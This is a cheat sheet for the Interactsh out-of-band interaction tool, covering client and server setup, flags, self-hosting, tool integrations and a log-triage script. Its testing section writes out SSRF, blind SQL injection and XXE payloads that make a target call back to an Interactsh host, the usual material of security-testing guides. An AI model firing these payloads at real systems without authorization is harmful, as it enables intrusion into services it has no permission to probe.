Interactsh OOB Interaction Gathering Cheat Sheet

Overview

Interactsh is an open-source tool developed by Project Discovery for detecting out-of-band (OOB) interactions. It's designed to identify vulnerabilities that cause external interactions, such as Server-Side Request Forgery (SSRF), Blind SQL Injection, XML External Entity (XXE) Injection, and other vulnerabilities that may not be immediately visible through traditional testing methods.

What makes Interactsh unique is its comprehensive approach to OOB testing. Unlike other tools that focus on specific protocols, Interactsh can detect interactions across multiple protocols, including DNS, HTTP(S), SMTP(S), and LDAP. It consists of both a server component that captures and logs these interactions and a client component that generates unique testing URLs and monitors for any interactions with those URLs.

Interactsh is widely used in security testing to identify vulnerabilities that might otherwise go undetected. It's particularly valuable for bug bounty hunters, penetration testers, and security researchers who need to verify the existence of vulnerabilities that rely on external interactions. The tool is also integrated with Nuclei, another Project Discovery tool, enabling automated vulnerability scanning with OOB detection capabilities.

Installation

Client Installation

Using Go

bash
# Install using Go (requires Go 1.20 or later)
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest

# Verify installation
interactsh-client -version

Using Docker

bash
# Pull the latest Docker image
docker pull projectdiscovery/interactsh:latest

# Run Interactsh client using Docker
docker run -it projectdiscovery/interactsh:latest client -h

Using Homebrew (macOS)

bash
# Install using Homebrew
brew install interactsh-client

# Verify installation
interactsh-client -version

Using PDTM (Project Discovery Tools Manager)

bash
# Install PDTM first if not already installed
go install -v github.com/projectdiscovery/pdtm/cmd/pdtm@latest

# Install Interactsh client using PDTM
pdtm -i interactsh-client

# Verify installation
interactsh-client -version

Server Installation (Self-Hosted)

Using Go

bash
# Install using Go (requires Go 1.20 or later)
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-server@latest

# Verify installation
interactsh-server -version

Using Docker

bash
# Pull the latest Docker image
docker pull projectdiscovery/interactsh:latest

# Run Interactsh server using Docker
docker run -it projectdiscovery/interactsh:latest server -h

Basic Usage

Client Usage

bash
# Start the client with default settings
interactsh-client

# Start the client with verbose output
interactsh-client -v

# Start the client with a specific server
interactsh-client -server your-interactsh-server.com

Server Usage (Self-Hosted)

bash
# Start the server with default settings
interactsh-server

# Start the server with a specific domain
interactsh-server -domain your-domain.com

# Start the server with verbose output
interactsh-server -v

Output Options

bash
# Save interactions to a file
interactsh-client -o interactions.log

# Output in JSON format
interactsh-client -json -o interactions.json

# Silent mode (no banner)
interactsh-client -silent
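
The following is an added example, not code from the original page or the Interactsh project, showing one way to triage the file written with `-json -o interactions.json`. It assumes one JSON object per line with `protocol`, `full-id` and `remote-address` fields, and that each payload was sent with a tester-chosen label prepended as a subdomain so the label appears at the start of `full-id`; the sample lines and identifier are constructed.

```python
import json
from collections import defaultdict

# Constructed sample; assumed format is one JSON object per line. Payloads are
# assumed to have been sent as <label>.<id>.<server>, so "full-id" starts with the label.
ID = "a" * 20 + "b" * 13  # constructed placeholder identifier
SAMPLE = "\n".join([
    '{"protocol":"dns","unique-id":"%s","full-id":"fetch-url.%s",'
    '"remote-address":"198.51.100.7"}' % (ID, ID),
    '{"protocol":"http","unique-id":"%s","full-id":"fetch-url.%s",'
    '"remote-address":"203.0.113.10"}' % (ID, ID),
    '{"protocol":"dns","unique-id":"%s","full-id":"xml-api.%s",'
    '"remote-address":"198.51.100.7"}' % (ID, ID),
    '{"protocol":"dns","unique-id":"',  # truncated write, must be skipped
])

def parse_interactions(text):
    """Return the well-formed interaction records, skipping anything else."""
    records = []
    for line in text.splitlines():
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # blank line, banner text or truncated record
        if isinstance(rec, dict) and "protocol" in rec and "full-id" in rec:
            records.append(rec)
    return records

def triage(records):
    """Group interactions by payload label and rate the evidence."""
    seen = defaultdict(lambda: {"protocols": set(), "sources": set()})
    for rec in records:
        label, dot, _ = rec["full-id"].partition(".")
        entry = seen[label if dot else "(unlabelled)"]
        entry["protocols"].add(rec["protocol"].lower())
        entry["sources"].add(rec.get("remote-address", "unknown"))
    report = {}
    for label, entry in seen.items():
        # A DNS lookup alone shows only that something resolved the name (often a
        # shared resolver or a scanner); a higher-layer hit shows a real connection.
        strong = entry["protocols"] - {"dns"}
        report[label] = {
            "verdict": "connection observed" if strong else "dns-only",
            "protocols": sorted(entry["protocols"]),
            "sources": sorted(entry["sources"]),
        }
    return report
```

With a real log, pass the file's text to `parse_interactions` and review every `dns-only` label by hand, since the source address of a DNS interaction is usually a resolver rather than the tested host.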

Client Configuration

Basic Configuration

bash
# Set polling interval (seconds)
interactsh-client -poll-interval 5

# Set interaction timeout (seconds)
interactsh-client -interaction-timeout 60

# Enable persistent session
interactsh-client -persistent-session

# Use a specific correlation ID
interactsh-client -correlation-id your-correlation-id

Authentication

bash
# Use token for authentication
interactsh-client -token your-auth-token

# Use a specific server with token
interactsh-client -server your-interactsh-server.com -token your-auth-token

Filtering

bash
# Filter interactions by type
interactsh-client -filter-type dns,http

# Filter interactions by IP
interactsh-client -filter-ip 1.2.3.4

# Filter interactions by content
interactsh-client -filter-content "admin"

Server Configuration (Self-Hosted)

Domain Configuration

bash
# Set domain for the server
interactsh-server -domain your-domain.com

# Set wildcard domain
interactsh-server -domain your-domain.com -wildcard

# Set IP address to listen on
interactsh-server -ip 1.2.3.4

Certificate Configuration

bash
# Use Let's Encrypt for certificates
interactsh-server -domain your-domain.com -letsencrypt

# Use custom certificates
interactsh-server -domain your-domain.com -cert cert.pem -key key.pem

Authentication Configuration

bash
# Enable authentication
interactsh-server -auth

# Set token for authentication
interactsh-server -auth-token your-auth-token

# Set token file for authentication
interactsh-server -auth-token-file tokens.txt

Advanced Usage

Client Advanced Features

bash
# Generate a specific number of URLs
interactsh-client -n 5

# Generate URLs with a specific payload
interactsh-client -payload-template "{{random}}.your-domain.com"

# Enable DNS callback only
interactsh-client -dns-only

# Enable HTTP callback only
interactsh-client -http-only

# Enable SMTP callback only
interactsh-client -smtp-only

Server Advanced Features

bash
# Enable specific services
interactsh-server -dns -http -smtp -ldap

# Disable specific services
interactsh-server -no-dns -no-http -no-smtp -no-ldap

# Set custom ports
interactsh-server -dns-port 53 -http-port 80 -https-port 443 -smtp-port 25 -smtps-port 587 -ldap-port 389

# Enable metrics
interactsh-server -metrics

Payload Generation

bash
# Generate a URL for testing
interactsh-client -generate-url

# Generate multiple URLs
interactsh-client -generate-url -n 5

# Generate URL with specific server
interactsh-client -generate-url -server your-interactsh-server.com

Integration with Other Tools

Integration with Nuclei

bash
# Use Interactsh with Nuclei
nuclei -u https://example.com -t nuclei-templates/

# Use a specific Interactsh server with Nuclei
nuclei -u https://example.com -t nuclei-templates/ -interactsh-server your-interactsh-server.com

# Disable Interactsh in Nuclei
nuclei -u https://example.com -t nuclei-templates/ -no-interactsh

Integration with Notify

bash
# Send Interactsh interactions to Discord
interactsh-client | notify -provider discord

# Send filtered interactions to Slack
interactsh-client -filter-type http | notify -provider slack

Integration with Custom Scripts

bash
#!/bin/bash
# Use Interactsh in a bash script
URL=$(interactsh-client -generate-url)
curl -s "https://example.com/test?url=$URL"
interactsh-client -poll-interval 5 -interaction-timeout 30

Testing Vulnerabilities

Testing SSRF

bash
# Generate a URL for SSRF testing
URL=$(interactsh-client -generate-url)

# Use the URL in a potential SSRF vulnerability
curl -s "https://example.com/fetch?url=http://$URL/test"

# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30

Testing Blind SQL Injection

bash
# Generate a URL for Blind SQL Injection testing
URL=$(interactsh-client -generate-url)

# Use the URL in a SQL query
curl -s "https://example.com/search?id=1' UNION SELECT LOAD_FILE(CONCAT('\\\\',$URL,'\\share'))"

# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30

Testing XXE Injection

bash
# Generate a URL for XXE testing
URL=$(interactsh-client -generate-url)

# Create an XML payload with XXE
cat > xxe.xml << EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://$URL/xxe">
]>
<foo>&xxe;</foo>
EOF

# Send the XML payload
curl -s -X POST -d @xxe.xml -H "Content-Type: application/xml" https://example.com/api

# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30

Troubleshooting

Common Issues

  1. No Interactions Detected

    bash
    # Increase polling interval
    interactsh-client -poll-interval 10

    # Increase interaction timeout
    interactsh-client -interaction-timeout 120

    # Check if the target is behind a firewall
    # Try using different protocols (DNS, HTTP, SMTP)

  2. Connection Issues

    bash
    # Check if the server is reachable
    ping your-interactsh-server.com

    # Try a different server
    interactsh-client -server oast.pro

    # Check if your network allows outbound connections

  3. Authentication Issues

    bash
    # Verify token
    interactsh-client -server your-interactsh-server.com -token your-auth-token -v

    # Check if the server requires authentication

  4. Server Setup Issues

    bash
    # Check DNS configuration
    dig ns your-domain.com

    # Verify that your domain's nameservers point to your server
    # Ensure that your server has the necessary ports open

Debugging

bash
# Enable verbose mode for client
interactsh-client -v

# Enable debug mode for client
interactsh-client -debug

# Enable verbose mode for server
interactsh-server -v

# Enable debug mode for server
interactsh-server -debug

Self-Hosting Guide

DNS Configuration

To self-host Interactsh, you need to configure your domain's DNS settings:

  1. Register a domain (e.g., your-domain.com)
  2. Set up NS records for your domain to point to your server:
    your-domain.com. IN NS ns1.your-domain.com.
    your-domain.com. IN NS ns2.your-domain.com.
  3. Set up A records for your nameservers:
    ns1.your-domain.com. IN A your-server-ip
    ns2.your-domain.com. IN A your-server-ip

Server Setup

bash
# Start the server with your domain
interactsh-server -domain your-domain.com

# Enable Let's Encrypt for HTTPS
interactsh-server -domain your-domain.com -letsencrypt

# Enable authentication
interactsh-server -domain your-domain.com -auth -auth-token your-auth-token

Docker Deployment

bash
# Create a docker-compose.yml file
cat > docker-compose.yml << EOF
version: '3'
services:
  interactsh-server:
    image: projectdiscovery/interactsh:latest
    command: server -domain your-domain.com -letsencrypt -auth -auth-token your-auth-token
    ports:
      - "53:53/udp"
      - "80:80"
      - "443:443"
      - "25:25"
      - "587:587"
      - "389:389"
    restart: always
EOF

# Start the server
docker-compose up -d

Configuration

Client Configuration File

Interactsh client uses a configuration file located at $HOME/.config/interactsh-client/config.yaml. You can customize various settings in this file:

yaml
# Example configuration file
server: oast.pro
token: your-auth-token
poll-interval: 5
interaction-timeout: 60
filter-type: dns,http

Server Configuration File

Interactsh server uses a configuration file located at $HOME/.config/interactsh-server/config.yaml. You can customize various settings in this file:

yaml
# Example configuration file
domain: your-domain.com
ip: 1.2.3.4
letsencrypt: true
auth: true
auth-token: your-auth-token

Environment Variables

bash
# Set Interactsh client configuration via environment variables
export INTERACTSH_SERVER=oast.pro
export INTERACTSH_TOKEN=your-auth-token
export INTERACTSH_POLL_INTERVAL=5
export INTERACTSH_INTERACTION_TIMEOUT=60

# Set Interactsh server configuration via environment variables
export INTERACTSH_DOMAIN=your-domain.com
export INTERACTSH_IP=1.2.3.4
export INTERACTSH_LETSENCRYPT=true
export INTERACTSH_AUTH=true
export INTERACTSH_AUTH_TOKEN=your-auth-token

Reference

Client Command Line Options

Flag                   Description
-server                Interactsh server to use
-token                 Authentication token for the server
-n                     Number of URLs to generate
-o, -output            File to write output to
-json                  Write output in JSON format
-v, -verbose           Show verbose output
-debug                 Show debug information
-poll-interval         Polling interval in seconds
-interaction-timeout   Interaction timeout in seconds
-persistent-session    Enable persistent session
-correlation-id        Correlation ID for the session
-filter-type           Filter interactions by type (dns, http, smtp, ldap)
-filter-ip             Filter interactions by IP
-filter-content        Filter interactions by content
-generate-url          Generate URL for testing
-dns-only              Enable DNS callback only
-http-only             Enable HTTP callback only
-smtp-only             Enable SMTP callback only
-ldap-only             Enable LDAP callback only
-payload-template      Custom payload template
-version               Show Interactsh client version

Server Command Line Options

Flag               Description
-domain            Domain to use for the server
-ip                IP address to listen on
-wildcard          Enable wildcard domain
-letsencrypt       Use Let's Encrypt for certificates
-cert              Path to certificate file
-key               Path to key file
-auth              Enable authentication
-auth-token        Authentication token
-auth-token-file   File containing authentication tokens
-dns               Enable DNS service
-http              Enable HTTP service
-smtp              Enable SMTP service
-ldap              Enable LDAP service
-no-dns            Disable DNS service
-no-http           Disable HTTP service
-no-smtp           Disable SMTP service
-no-ldap           Disable LDAP service
-dns-port          Port for DNS service
-http-port         Port for HTTP service
-https-port        Port for HTTPS service
-smtp-port         Port for SMTP service
-smtps-port        Port for SMTPS service
-ldap-port         Port for LDAP service
-metrics           Enable metrics
-v, -verbose       Show verbose output
-debug             Show debug information
-version           Show Interactsh server version

Supported Interaction Types

Type   Description
dns    DNS interactions
http   HTTP/HTTPS interactions
smtp   SMTP/SMTPS interactions
ldap   LDAP interactions

This cheat sheet provides a comprehensive reference for using Interactsh, from basic client and server usage to advanced configuration and integration with other tools. For the most up-to-date information, always refer to the official documentation.